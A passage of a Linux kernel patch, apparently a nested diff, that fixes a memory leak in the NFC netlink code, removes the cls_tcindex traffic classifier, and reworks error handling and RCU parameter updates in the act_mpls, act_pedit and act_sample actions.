+ }
+diff --git a/net/nfc/netlink.c b/net/nfc/netlink.c
+index 1fc339084d897..348bf561bc9fb 100644
+--- a/net/nfc/netlink.c
++++ b/net/nfc/netlink.c
+@@ -1442,7 +1442,11 @@ static int nfc_se_io(struct nfc_dev *dev, u32 se_idx,
+ 	rc = dev->ops->se_io(dev, se_idx, apdu,
+ 			apdu_length, cb, cb_context);
+ 
++	device_unlock(&dev->dev);
++	return rc;
++
+ error:
++	kfree(cb_context);
+ 	device_unlock(&dev->dev);
+ 	return rc;
+ }
+diff --git a/net/sched/Kconfig b/net/sched/Kconfig
+index 4662a6ce8a7e7..bcdd6e925343f 100644
+--- a/net/sched/Kconfig
++++ b/net/sched/Kconfig
+@@ -503,17 +503,6 @@ config NET_CLS_BASIC
+ 	  To compile this code as a module, choose M here: the
+ 	  module will be called cls_basic.
+ 
+-config NET_CLS_TCINDEX
+-	tristate "Traffic-Control Index (TCINDEX)"
+-	select NET_CLS
+-	help
+-	  Say Y here if you want to be able to classify packets based on
+-	  traffic control indices. You will want this feature if you want
+-	  to implement Differentiated Services together with DSMARK.
+-
+-	  To compile this code as a module, choose M here: the
+-	  module will be called cls_tcindex.
+-
+ config NET_CLS_ROUTE4
+ 	tristate "Routing decision (ROUTE)"
+ 	depends on INET
+diff --git a/net/sched/Makefile b/net/sched/Makefile
+index dd14ef413fdad..b7dbac5c519f6 100644
+--- a/net/sched/Makefile
++++ b/net/sched/Makefile
+@@ -70,7 +70,6 @@ obj-$(CONFIG_NET_CLS_U32)	+= cls_u32.o
+ obj-$(CONFIG_NET_CLS_ROUTE4)	+= cls_route.o
+ obj-$(CONFIG_NET_CLS_FW)	+= cls_fw.o
+ obj-$(CONFIG_NET_CLS_RSVP)	+= cls_rsvp.o
+-obj-$(CONFIG_NET_CLS_TCINDEX)	+= cls_tcindex.o
+ obj-$(CONFIG_NET_CLS_RSVP6)	+= cls_rsvp6.o
+ obj-$(CONFIG_NET_CLS_BASIC)	+= cls_basic.o
+ obj-$(CONFIG_NET_CLS_FLOW)	+= cls_flow.o
+diff --git a/net/sched/act_mpls.c b/net/sched/act_mpls.c
+index ea5959094adb0..f24f997a7aaf9 100644
+--- a/net/sched/act_mpls.c
++++ b/net/sched/act_mpls.c
+@@ -188,40 +188,67 @@ static int tcf_mpls_init(struct net *net, struct nlattr *nla,
+ 	parm = nla_data(tb[TCA_MPLS_PARMS]);
+ 	index = parm->index;
+ 
++	err = tcf_idr_check_alloc(tn, &index, a, bind);
++	if (err < 0)
++		return err;
++	exists = err;
++	if (exists && bind)
++		return 0;
++
++	if (!exists) {
++		ret = tcf_idr_create(tn, index, est, a, &act_mpls_ops, bind,
++				     true, flags);
++		if (ret) {
++			tcf_idr_cleanup(tn, index);
++			return ret;
++		}
++
++		ret = ACT_P_CREATED;
++	} else if (!(flags & TCA_ACT_FLAGS_REPLACE)) {
++		tcf_idr_release(*a, bind);
++		return -EEXIST;
++	}
++
+ 	/* Verify parameters against action type. */
+ 	switch (parm->m_action) {
+ 	case TCA_MPLS_ACT_POP:
+ 		if (!tb[TCA_MPLS_PROTO]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Protocol must be set for MPLS pop");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		if (!eth_proto_is_802_3(nla_get_be16(tb[TCA_MPLS_PROTO]))) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Invalid protocol type for MPLS pop");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		if (tb[TCA_MPLS_LABEL] || tb[TCA_MPLS_TTL] || tb[TCA_MPLS_TC] ||
+ 		    tb[TCA_MPLS_BOS]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Label, TTL, TC or BOS cannot be used with MPLS pop");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		break;
+ 	case TCA_MPLS_ACT_DEC_TTL:
+ 		if (tb[TCA_MPLS_PROTO] || tb[TCA_MPLS_LABEL] ||
+ 		    tb[TCA_MPLS_TTL] || tb[TCA_MPLS_TC] || tb[TCA_MPLS_BOS]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Label, TTL, TC, BOS or protocol cannot be used with MPLS dec_ttl");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		break;
+ 	case TCA_MPLS_ACT_PUSH:
+ 	case TCA_MPLS_ACT_MAC_PUSH:
+ 		if (!tb[TCA_MPLS_LABEL]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Label is required for MPLS push");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		if (tb[TCA_MPLS_PROTO] &&
+ 		    !eth_p_mpls(nla_get_be16(tb[TCA_MPLS_PROTO]))) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Protocol must be an MPLS type for MPLS push");
+-			return -EPROTONOSUPPORT;
++			err = -EPROTONOSUPPORT;
++			goto release_idr;
+ 		}
+ 		/* Push needs a TTL - if not specified, set a default value. */
+ 		if (!tb[TCA_MPLS_TTL]) {
+@@ -236,33 +263,14 @@ static int tcf_mpls_init(struct net *net, struct nlattr *nla,
+ 	case TCA_MPLS_ACT_MODIFY:
+ 		if (tb[TCA_MPLS_PROTO]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Protocol cannot be used with MPLS modify");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		break;
+ 	default:
+ 		NL_SET_ERR_MSG_MOD(extack, "Unknown MPLS action");
+-		return -EINVAL;
+-	}
+-
+-	err = tcf_idr_check_alloc(tn, &index, a, bind);
+-	if (err < 0)
+-		return err;
+-	exists = err;
+-	if (exists && bind)
+-		return 0;
+-
+-	if (!exists) {
+-		ret = tcf_idr_create(tn, index, est, a,
+-				     &act_mpls_ops, bind, true, flags);
+-		if (ret) {
+-			tcf_idr_cleanup(tn, index);
+-			return ret;
+-		}
+-
+-		ret = ACT_P_CREATED;
+-	} else if (!(flags & TCA_ACT_FLAGS_REPLACE)) {
+-		tcf_idr_release(*a, bind);
+-		return -EEXIST;
++		err = -EINVAL;
++		goto release_idr;
+ 	}
+ 
+ 	err = tcf_action_check_ctrlact(parm->action, tp, &goto_ch, extack);
+diff --git a/net/sched/act_pedit.c b/net/sched/act_pedit.c
+index 94ed5857ce678..238759c3192e8 100644
+--- a/net/sched/act_pedit.c
++++ b/net/sched/act_pedit.c
+@@ -133,6 +133,17 @@ nla_failure:
+ 	return -EINVAL;
+ }
+ 
++static void tcf_pedit_cleanup_rcu(struct rcu_head *head)
++{
++	struct tcf_pedit_parms *parms =
++		container_of(head, struct tcf_pedit_parms, rcu);
++
++	kfree(parms->tcfp_keys_ex);
++	kfree(parms->tcfp_keys);
++
++	kfree(parms);
++}
++
+ static int tcf_pedit_init(struct net *net, struct nlattr *nla,
+ 			  struct nlattr *est, struct tc_action **a,
+ 			  struct tcf_proto *tp, u32 flags,
+@@ -140,10 +151,9 @@ static int tcf_pedit_init(struct net *net, struct nlattr *nla,
+ {
+ 	struct tc_action_net *tn = net_generic(net, act_pedit_ops.net_id);
+ 	bool bind = flags & TCA_ACT_FLAGS_BIND;
+-	struct nlattr *tb[TCA_PEDIT_MAX + 1];
+ 	struct tcf_chain *goto_ch = NULL;
+-	struct tc_pedit_key *keys = NULL;
+-	struct tcf_pedit_key_ex *keys_ex;
++	struct tcf_pedit_parms *oparms, *nparms;
++	struct nlattr *tb[TCA_PEDIT_MAX + 1];
+ 	struct tc_pedit *parm;
+ 	struct nlattr *pattr;
+ 	struct tcf_pedit *p;
+@@ -170,109 +180,125 @@ static int tcf_pedit_init(struct net *net, struct nlattr *nla,
+ 	}
+ 
+ 	parm = nla_data(pattr);
+-	if (!parm->nkeys) {
+-		NL_SET_ERR_MSG_MOD(extack, "Pedit requires keys to be passed");
+-		return -EINVAL;
+-	}
+-	ksize = parm->nkeys * sizeof(struct tc_pedit_key);
+-	if (nla_len(pattr) < sizeof(*parm) + ksize) {
+-		NL_SET_ERR_MSG_ATTR(extack, pattr, "Length of TCA_PEDIT_PARMS or TCA_PEDIT_PARMS_EX pedit attribute is invalid");
+-		return -EINVAL;
+-	}
+-
+-	keys_ex = tcf_pedit_keys_ex_parse(tb[TCA_PEDIT_KEYS_EX], parm->nkeys);
+-	if (IS_ERR(keys_ex))
+-		return PTR_ERR(keys_ex);
+ 
+ 	index = parm->index;
+ 	err = tcf_idr_check_alloc(tn, &index, a, bind);
+ 	if (!err) {
+-		ret = tcf_idr_create(tn, index, est, a,
+-				     &act_pedit_ops, bind, false, flags);
++		ret = tcf_idr_create_from_flags(tn, index, est, a,
++						&act_pedit_ops, bind, flags);
+ 		if (ret) {
+ 			tcf_idr_cleanup(tn, index);
+-			goto out_free;
++			return ret;
+ 		}
+ 		ret = ACT_P_CREATED;
+ 	} else if (err > 0) {
+ 		if (bind)
+-			goto out_free;
++			return 0;
+ 		if (!(flags & TCA_ACT_FLAGS_REPLACE)) {
+ 			ret = -EEXIST;
+ 			goto out_release;
+ 		}
+ 	} else {
+-		ret = err;
++		return err;
++	}
++
++	if (!parm->nkeys) {
++		NL_SET_ERR_MSG_MOD(extack, "Pedit requires keys to be passed");
++		ret = -EINVAL;
++		goto out_release;
++	}
++	ksize = parm->nkeys * sizeof(struct tc_pedit_key);
++	if (nla_len(pattr) < sizeof(*parm) + ksize) {
++		NL_SET_ERR_MSG_ATTR(extack, pattr, "Length of TCA_PEDIT_PARMS or TCA_PEDIT_PARMS_EX pedit attribute is invalid");
++		ret = -EINVAL;
++		goto out_release;
++	}
++
++	nparms = kzalloc(sizeof(*nparms), GFP_KERNEL);
++	if (!nparms) {
++		ret = -ENOMEM;
++		goto out_release;
++	}
++
++	nparms->tcfp_keys_ex =
++		tcf_pedit_keys_ex_parse(tb[TCA_PEDIT_KEYS_EX], parm->nkeys);
++	if (IS_ERR(nparms->tcfp_keys_ex)) {
++		ret = PTR_ERR(nparms->tcfp_keys_ex);
+ 		goto out_free;
+ 	}
+ 
+ 	err = tcf_action_check_ctrlact(parm->action, tp, &goto_ch, extack);
+ 	if (err < 0) {
+ 		ret = err;
+-		goto out_release;
++		goto out_free_ex;
+ 	}
+-	p = to_pedit(*a);
+-	spin_lock_bh(&p->tcf_lock);
+ 
+-	if (ret == ACT_P_CREATED ||
+-	    (p->tcfp_nkeys && p->tcfp_nkeys != parm->nkeys)) {
+-		keys = kmalloc(ksize, GFP_ATOMIC);
+-		if (!keys) {
+-			spin_unlock_bh(&p->tcf_lock);
+-			ret = -ENOMEM;
+-			goto put_chain;
+-		}
+-		kfree(p->tcfp_keys);
+-		p->tcfp_keys = keys;
+-		p->tcfp_nkeys = parm->nkeys;
++	nparms->tcfp_off_max_hint = 0;
++	nparms->tcfp_flags = parm->flags;
++	nparms->tcfp_nkeys = parm->nkeys;
++
++	nparms->tcfp_keys = kmalloc(ksize, GFP_KERNEL);
++	if (!nparms->tcfp_keys) {
++		ret = -ENOMEM;
++		goto put_chain;
+ 	}
+-	memcpy(p->tcfp_keys, parm->keys, ksize);
+-	p->tcfp_off_max_hint = 0;
+-	for (i = 0; i < p->tcfp_nkeys; ++i) {
+-		u32 cur = p->tcfp_keys[i].off;
++
++	memcpy(nparms->tcfp_keys, parm->keys, ksize);
++
++	for (i = 0; i < nparms->tcfp_nkeys; ++i) {
++		u32 cur = nparms->tcfp_keys[i].off;
+ 
+ 		/* sanitize the shift value for any later use */
+-		p->tcfp_keys[i].shift = min_t(size_t, BITS_PER_TYPE(int) - 1,
+-					      p->tcfp_keys[i].shift);
++		nparms->tcfp_keys[i].shift = min_t(size_t,
++						   BITS_PER_TYPE(int) - 1,
++						   nparms->tcfp_keys[i].shift);
+ 
+ 		/* The AT option can read a single byte, we can bound the actual
+ 		 * value with uchar max.
+ 		 */
+-		cur += (0xff & p->tcfp_keys[i].offmask) >> p->tcfp_keys[i].shift;
++		cur += (0xff & nparms->tcfp_keys[i].offmask) >> nparms->tcfp_keys[i].shift;
+ 
+ 		/* Each key touches 4 bytes starting from the computed offset */
+-		p->tcfp_off_max_hint = max(p->tcfp_off_max_hint, cur + 4);
++		nparms->tcfp_off_max_hint =
++			max(nparms->tcfp_off_max_hint, cur + 4);
+ 	}
+ 
+-	p->tcfp_flags = parm->flags;
++	p = to_pedit(*a);
++
++	spin_lock_bh(&p->tcf_lock);
+ 	goto_ch = tcf_action_set_ctrlact(*a, parm->action, goto_ch);
++	oparms = rcu_replace_pointer(p->parms, nparms, 1);
++	spin_unlock_bh(&p->tcf_lock);
+ 
+-	kfree(p->tcfp_keys_ex);
+-	p->tcfp_keys_ex = keys_ex;
++	if (oparms)
++		call_rcu(&oparms->rcu, tcf_pedit_cleanup_rcu);
+ 
+-	spin_unlock_bh(&p->tcf_lock);
+ 	if (goto_ch)
+ 		tcf_chain_put_by_act(goto_ch);
++
+ 	return ret;
+ 
+ put_chain:
+ 	if (goto_ch)
+ 		tcf_chain_put_by_act(goto_ch);
++out_free_ex:
++	kfree(nparms->tcfp_keys_ex);
++out_free:
++	kfree(nparms);
+ out_release:
+ 	tcf_idr_release(*a, bind);
+-out_free:
+-	kfree(keys_ex);
+ 	return ret;
+-
+ }
+ 
+ static void tcf_pedit_cleanup(struct tc_action *a)
+ {
+ 	struct tcf_pedit *p = to_pedit(a);
+-	struct tc_pedit_key *keys = p->tcfp_keys;
++	struct tcf_pedit_parms *parms;
+ 
+-	kfree(keys);
+-	kfree(p->tcfp_keys_ex);
++	parms = rcu_dereference_protected(p->parms, 1);
++
++	if (parms)
++		call_rcu(&parms->rcu, tcf_pedit_cleanup_rcu);
+ }
+ 
+ static bool offset_valid(struct sk_buff *skb, int offset)
+@@ -323,28 +349,30 @@ static int tcf_pedit_act(struct sk_buff *skb, const struct tc_action *a,
+ 			 struct tcf_result *res)
+ {
+ 	struct tcf_pedit *p = to_pedit(a);
++	struct tcf_pedit_parms *parms;
+ 	u32 max_offset;
+ 	int i;
+ 
+-	spin_lock(&p->tcf_lock);
++	parms = rcu_dereference_bh(p->parms);
+ 
+ 	max_offset = (skb_transport_header_was_set(skb) ?
+ 		      skb_transport_offset(skb) :
+ 		      skb_network_offset(skb)) +
+-		     p->tcfp_off_max_hint;
++		     parms->tcfp_off_max_hint;
+ 	if (skb_ensure_writable(skb, min(skb->len, max_offset)))
+-		goto unlock;
++		goto done;
+ 
+ 	tcf_lastuse_update(&p->tcf_tm);
++	tcf_action_update_bstats(&p->common, skb);
+ 
+-	if (p->tcfp_nkeys > 0) {
+-		struct tc_pedit_key *tkey = p->tcfp_keys;
+-		struct tcf_pedit_key_ex *tkey_ex = p->tcfp_keys_ex;
++	if (parms->tcfp_nkeys > 0) {
++		struct tc_pedit_key *tkey = parms->tcfp_keys;
++		struct tcf_pedit_key_ex *tkey_ex = parms->tcfp_keys_ex;
+ 		enum pedit_header_type htype =
+ 			TCA_PEDIT_KEY_EX_HDR_TYPE_NETWORK;
+ 		enum pedit_cmd cmd = TCA_PEDIT_KEY_EX_CMD_SET;
+ 
+-		for (i = p->tcfp_nkeys; i > 0; i--, tkey++) {
++		for (i = parms->tcfp_nkeys; i > 0; i--, tkey++) {
+ 			u32 *ptr, hdata;
+ 			int offset = tkey->off;
+ 			int hoffset;
+@@ -420,11 +448,10 @@ static int tcf_pedit_act(struct sk_buff *skb, const struct tc_action *a,
+ 	}
+ 
+ bad:
++	spin_lock(&p->tcf_lock);
+ 	p->tcf_qstats.overlimits++;
+-done:
+-	bstats_update(&p->tcf_bstats, skb);
+-unlock:
+ 	spin_unlock(&p->tcf_lock);
++done:
+ 	return p->tcf_action;
+ }
+ 
+@@ -443,30 +470,33 @@ static int tcf_pedit_dump(struct sk_buff *skb, struct tc_action *a,
+ {
+ 	unsigned char *b = skb_tail_pointer(skb);
+ 	struct tcf_pedit *p = to_pedit(a);
++	struct tcf_pedit_parms *parms;
+ 	struct tc_pedit *opt;
+ 	struct tcf_t t;
+ 	int s;
+ 
+-	s = struct_size(opt, keys, p->tcfp_nkeys);
++	spin_lock_bh(&p->tcf_lock);
++	parms = rcu_dereference_protected(p->parms, 1);
++	s = struct_size(opt, keys, parms->tcfp_nkeys);
+ 
+-	/* netlink spinlocks held above us - must use ATOMIC */
+ 	opt = kzalloc(s, GFP_ATOMIC);
+-	if (unlikely(!opt))
++	if (unlikely(!opt)) {
++		spin_unlock_bh(&p->tcf_lock);
+ 		return -ENOBUFS;
++	}
+ 
+-	spin_lock_bh(&p->tcf_lock);
+-	memcpy(opt->keys, p->tcfp_keys, flex_array_size(opt, keys, p->tcfp_nkeys));
++	memcpy(opt->keys, parms->tcfp_keys,
++	       flex_array_size(opt, keys, parms->tcfp_nkeys));
+ 	opt->index = p->tcf_index;
+-	opt->nkeys = p->tcfp_nkeys;
+-	opt->flags = p->tcfp_flags;
++	opt->nkeys = parms->tcfp_nkeys;
++	opt->flags = parms->tcfp_flags;
+ 	opt->action = p->tcf_action;
+ 	opt->refcnt = refcount_read(&p->tcf_refcnt) - ref;
+ 	opt->bindcnt = atomic_read(&p->tcf_bindcnt) - bind;
+ 
+-	if (p->tcfp_keys_ex) {
+-		if (tcf_pedit_key_ex_dump(skb,
+-					  p->tcfp_keys_ex,
+-					  p->tcfp_nkeys))
++	if (parms->tcfp_keys_ex) {
++		if (tcf_pedit_key_ex_dump(skb, parms->tcfp_keys_ex,
++					  parms->tcfp_nkeys))
+ 			goto nla_put_failure;
+ 
+ 		if (nla_put(skb, TCA_PEDIT_PARMS_EX, s, opt))
+diff --git a/net/sched/act_sample.c b/net/sched/act_sample.c
+index 7a25477f5d996..09735a33e57e2 100644
+--- a/net/sched/act_sample.c
++++ b/net/sched/act_sample.c
+@@ -54,8 +54,8 @@ static int tcf_sample_init(struct net *net, struct nlattr *nla,
+ 					  sample_policy, NULL);
+ 	if (ret < 0)
+ 		return ret;
+-	if (!tb[TCA_SAMPLE_PARMS] || !tb[TCA_SAMPLE_RATE] ||
+-	    !tb[TCA_SAMPLE_PSAMPLE_GROUP])
++
++	if (!tb[TCA_SAMPLE_PARMS])
+ 		return -EINVAL;
+ 
+ 	parm = nla_data(tb[TCA_SAMPLE_PARMS]);
+@@ -79,6 +79,13 @@ static int tcf_sample_init(struct net *net, struct nlattr *nla,
+ 		tcf_idr_release(*a, bind);
+ 		return -EEXIST;
+ 	}
++
++	if (!tb[TCA_SAMPLE_RATE] || !tb[TCA_SAMPLE_PSAMPLE_GROUP]) {
++		NL_SET_ERR_MSG(extack, "sample rate and group are required");
++		err = -EINVAL;
++		goto release_idr;
++	}
++
+ 	err = tcf_action_check_ctrlact(parm->action, tp, &goto_ch, extack);
+ 	if (err < 0)
+ 		goto release_idr;
+diff --git a/net/sched/cls_tcindex.c b/net/sched/cls_tcindex.c
+deleted file mode 100644
+index eea8e185fcdb2..0000000000000
+--- a/net/sched/cls_tcindex.c
++++ /dev/null
+@@ -1,741 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-only
+-/*
+- * net/sched/cls_tcindex.c	Packet classifier for skb->tc_index
+- *
+- * Written 1998,1999 by Werner Almesberger, EPFL ICA
+- */
+-
+-#include <linux/module.h>
+-#include <linux/types.h>
+-#include <linux/kernel.h>
+-#include <linux/skbuff.h>
+-#include <linux/errno.h>
+-#include <linux/slab.h>
+-#include <linux/refcount.h>
+-#include <linux/rcupdate.h>
+-#include <net/act_api.h>
+-#include <net/netlink.h>
+-#include <net/pkt_cls.h>
+-#include <net/sch_generic.h>
+-
+-/*
+- * Passing parameters to the root seems to be done more awkwardly than really
+- * necessary. At least, u32 doesn't seem to use such dirty hacks. To be
+- * verified. FIXME.
+- */
+-
+-#define PERFECT_HASH_THRESHOLD	64	/* use perfect hash if not bigger */
+-#define DEFAULT_HASH_SIZE	64	/* optimized for diffserv */
+-
+-
+-struct tcindex_data;
+-
+-struct tcindex_filter_result {
+-	struct tcf_exts		exts;
+-	struct tcf_result	res;
+-	struct tcindex_data	*p;
+-	struct rcu_work		rwork;
+-};
+-
+-struct tcindex_filter {
+-	u16 key;
+-	struct tcindex_filter_result result;
+-	struct tcindex_filter __rcu *next;
+-	struct rcu_work rwork;
+-};
+-
+-
+-struct tcindex_data {
+-	struct tcindex_filter_result *perfect; /* perfect hash; NULL if none */
+-	struct tcindex_filter __rcu **h; /* imperfect hash; */
+-	struct tcf_proto *tp;
+-	u16 mask;		/* AND key with mask */
+-	u32 shift;		/* shift ANDed key to the right */
+-	u32 hash;		/* hash table size; 0 if undefined */
+-	u32 alloc_hash;		/* allocated size */
+-	u32 fall_through;	/* 0: only classify if explicit match */
+-	refcount_t refcnt;	/* a temporary refcnt for perfect hash */
+-	struct rcu_work rwork;
+-};
+-
+-static inline int tcindex_filter_is_set(struct tcindex_filter_result *r)
+-{
+-	return tcf_exts_has_actions(&r->exts) || r->res.classid;
+-}
+-
+-static void tcindex_data_get(struct tcindex_data *p)
+-{
+-	refcount_inc(&p->refcnt);
+-}
+-
+-static void tcindex_data_put(struct tcindex_data *p)
+-{
+-	if (refcount_dec_and_test(&p->refcnt)) {
+-		kfree(p->perfect);
+-		kfree(p->h);
+-		kfree(p);
+-	}
+-}
+-
+-static struct tcindex_filter_result *tcindex_lookup(struct tcindex_data *p,
+-						    u16 key)
+-{
+-	if (p->perfect) {
+-		struct tcindex_filter_result *f = p->perfect + key;
+-
+-		return tcindex_filter_is_set(f) ? f : NULL;
+-	} else if (p->h) {
+-		struct tcindex_filter __rcu **fp;
+-		struct tcindex_filter *f;
+-
+-		fp = &p->h[key % p->hash];
+-		for (f = rcu_dereference_bh_rtnl(*fp);
+-		     f;
+-		     fp = &f->next, f = rcu_dereference_bh_rtnl(*fp))
+-			if (f->key == key)
+-				return &f->result;
+-	}
+-
+-	return NULL;
+-}
+-
+-
+-static int tcindex_classify(struct sk_buff *skb, const struct tcf_proto *tp,
+-			    struct tcf_result *res)
+-{
+-	struct tcindex_data *p = rcu_dereference_bh(tp->root);
+-	struct tcindex_filter_result *f;
+-	int key = (skb->tc_index & p->mask) >> p->shift;
+-
+-	pr_debug("tcindex_classify(skb %p,tp %p,res %p),p %p\n",
+-		 skb, tp, res, p);
+-
+-	f = tcindex_lookup(p, key);
+-	if (!f) {
+-		struct Qdisc *q = tcf_block_q(tp->chain->block);
+-
+-		if (!p->fall_through)
+-			return -1;
+-		res->classid = TC_H_MAKE(TC_H_MAJ(q->handle), key);
+-		res->class = 0;
+-		pr_debug("alg 0x%x\n", res->classid);
+-		return 0;
+-	}
+-	*res = f->res;
+-	pr_debug("map 0x%x\n", res->classid);
+-
+-	return tcf_exts_exec(skb, &f->exts, res);
+-}
+-
+-
+-static void *tcindex_get(struct tcf_proto *tp, u32 handle)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter_result *r;
+-
+-	pr_debug("tcindex_get(tp %p,handle 0x%08x)\n", tp, handle);
+-	if (p->perfect && handle >= p->alloc_hash)
+-		return NULL;
+-	r = tcindex_lookup(p, handle);
+-	return r && tcindex_filter_is_set(r) ? r : NULL;
+-}
+-
+-static int tcindex_init(struct tcf_proto *tp)
+-{
+-	struct tcindex_data *p;
+-
+-	pr_debug("tcindex_init(tp %p)\n", tp);
+-	p = kzalloc(sizeof(struct tcindex_data), GFP_KERNEL);
+-	if (!p)
+-		return -ENOMEM;
+-
+-	p->mask = 0xffff;
+-	p->hash = DEFAULT_HASH_SIZE;
+-	p->fall_through = 1;
+-	refcount_set(&p->refcnt, 1); /* Paired with tcindex_destroy_work() */
+-
+-	rcu_assign_pointer(tp->root, p);
+-	return 0;
+-}
+-
+-static void __tcindex_destroy_rexts(struct tcindex_filter_result *r)
+-{
+-	tcf_exts_destroy(&r->exts);
+-	tcf_exts_put_net(&r->exts);
+-	tcindex_data_put(r->p);
+-}
+-
+-static void tcindex_destroy_rexts_work(struct work_struct *work)
+-{
+-	struct tcindex_filter_result *r;
+-
+-	r = container_of(to_rcu_work(work),
+-			 struct tcindex_filter_result,
+-			 rwork);
+-	rtnl_lock();
+-	__tcindex_destroy_rexts(r);
+-	rtnl_unlock();
+-}
+-
+-static void __tcindex_destroy_fexts(struct tcindex_filter *f)
+-{
+-	tcf_exts_destroy(&f->result.exts);
+-	tcf_exts_put_net(&f->result.exts);
+-	kfree(f);
+-}
+-
+-static void tcindex_destroy_fexts_work(struct work_struct *work)
+-{
+-	struct tcindex_filter *f = container_of(to_rcu_work(work),
+-						struct tcindex_filter,
+-						rwork);
+-
+-	rtnl_lock();
+-	__tcindex_destroy_fexts(f);
+-	rtnl_unlock();
+-}
+-
+-static int tcindex_delete(struct tcf_proto *tp, void *arg, bool *last,
+-			  bool rtnl_held, struct netlink_ext_ack *extack)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter_result *r = arg;
+-	struct tcindex_filter __rcu **walk;
+-	struct tcindex_filter *f = NULL;
+-
+-	pr_debug("tcindex_delete(tp %p,arg %p),p %p\n", tp, arg, p);
+-	if (p->perfect) {
+-		if (!r->res.class)
+-			return -ENOENT;
+-	} else {
+-		int i;
+-
+-		for (i = 0; i < p->hash; i++) {
+-			walk = p->h + i;
+-			for (f = rtnl_dereference(*walk); f;
+-			     walk = &f->next, f = rtnl_dereference(*walk)) {
+-				if (&f->result == r)
+-					goto found;
+-			}
+-		}
+-		return -ENOENT;
+-
+-found:
+-		rcu_assign_pointer(*walk, rtnl_dereference(f->next));
+-	}
+-	tcf_unbind_filter(tp, &r->res);
+-	/* all classifiers are required to call tcf_exts_destroy() after rcu
+-	 * grace period, since converted-to-rcu actions are relying on that
+-	 * in cleanup() callback
+-	 */
+-	if (f) {
+-		if (tcf_exts_get_net(&f->result.exts))
+-			tcf_queue_work(&f->rwork, tcindex_destroy_fexts_work);
+-		else
+-			__tcindex_destroy_fexts(f);
+-	} else {
+-		tcindex_data_get(p);
+-
+-		if (tcf_exts_get_net(&r->exts))
+-			tcf_queue_work(&r->rwork, tcindex_destroy_rexts_work);
+-		else
+-			__tcindex_destroy_rexts(r);
+-	}
+-
+-	*last = false;
+-	return 0;
+-}
+-
+-static void tcindex_destroy_work(struct work_struct *work)
+-{
+-	struct tcindex_data *p = container_of(to_rcu_work(work),
+-					      struct tcindex_data,
+-					      rwork);
+-
+-	tcindex_data_put(p);
+-}
+-
+-static inline int
+-valid_perfect_hash(struct tcindex_data *p)
+-{
+-	return  p->hash > (p->mask >> p->shift);
+-}
+-
+-static const struct nla_policy tcindex_policy[TCA_TCINDEX_MAX + 1] = {
+-	[TCA_TCINDEX_HASH]		= { .type = NLA_U32 },
+-	[TCA_TCINDEX_MASK]		= { .type = NLA_U16 },
+-	[TCA_TCINDEX_SHIFT]		= { .type = NLA_U32 },
+-	[TCA_TCINDEX_FALL_THROUGH]	= { .type = NLA_U32 },
+-	[TCA_TCINDEX_CLASSID]		= { .type = NLA_U32 },
+-};
+-
+-static int tcindex_filter_result_init(struct tcindex_filter_result *r,
+-				      struct tcindex_data *p,
+-				      struct net *net)
+-{
+-	memset(r, 0, sizeof(*r));
+-	r->p = p;
+-	return tcf_exts_init(&r->exts, net, TCA_TCINDEX_ACT,
+-			     TCA_TCINDEX_POLICE);
+-}
+-
+-static void tcindex_free_perfect_hash(struct tcindex_data *cp);
+-
+-static void tcindex_partial_destroy_work(struct work_struct *work)
+-{
+-	struct tcindex_data *p = container_of(to_rcu_work(work),
+-					      struct tcindex_data,
+-					      rwork);
+-
+-	rtnl_lock();
+-	if (p->perfect)
+-		tcindex_free_perfect_hash(p);
+-	kfree(p);
+-	rtnl_unlock();
+-}
+-
+-static void tcindex_free_perfect_hash(struct tcindex_data *cp)
+-{
+-	int i;
+-
+-	for (i = 0; i < cp->hash; i++)
+-		tcf_exts_destroy(&cp->perfect[i].exts);
+-	kfree(cp->perfect);
+-}
+-
+-static int tcindex_alloc_perfect_hash(struct net *net, struct tcindex_data *cp)
+-{
+-	int i, err = 0;
+-
+-	cp->perfect = kcalloc(cp->hash, sizeof(struct tcindex_filter_result),
+-			      GFP_KERNEL | __GFP_NOWARN);
+-	if (!cp->perfect)
+-		return -ENOMEM;
+-
+-	for (i = 0; i < cp->hash; i++) {
+-		err = tcf_exts_init(&cp->perfect[i].exts, net,
+-				    TCA_TCINDEX_ACT, TCA_TCINDEX_POLICE);
+-		if (err < 0)
+-			goto errout;
+-		cp->perfect[i].p = cp;
+-	}
+-
+-	return 0;
+-
+-errout:
+-	tcindex_free_perfect_hash(cp);
+-	return err;
+-}
+-
+-static int
+-tcindex_set_parms(struct net *net, struct tcf_proto *tp, unsigned long base,
+-		  u32 handle, struct tcindex_data *p,
+-		  struct tcindex_filter_result *r, struct nlattr **tb,
+-		  struct nlattr *est, u32 flags, struct netlink_ext_ack *extack)
+-{
+-	struct tcindex_filter_result new_filter_result;
+-	struct tcindex_data *cp = NULL, *oldp;
+-	struct tcindex_filter *f = NULL; /* make gcc behave */
+-	struct tcf_result cr = {};
+-	int err, balloc = 0;
+-	struct tcf_exts e;
+-	bool update_h = false;
+-
+-	err = tcf_exts_init(&e, net, TCA_TCINDEX_ACT, TCA_TCINDEX_POLICE);
+-	if (err < 0)
+-		return err;
+-	err = tcf_exts_validate(net, tp, tb, est, &e, flags, extack);
+-	if (err < 0)
+-		goto errout;
+-
+-	err = -ENOMEM;
+-	/* tcindex_data attributes must look atomic to classifier/lookup so
+-	 * allocate new tcindex data and RCU assign it onto root. Keeping
+-	 * perfect hash and hash pointers from old data.
+-	 */
+-	cp = kzalloc(sizeof(*cp), GFP_KERNEL);
+-	if (!cp)
+-		goto errout;
+-
+-	cp->mask = p->mask;
+-	cp->shift = p->shift;
+-	cp->hash = p->hash;
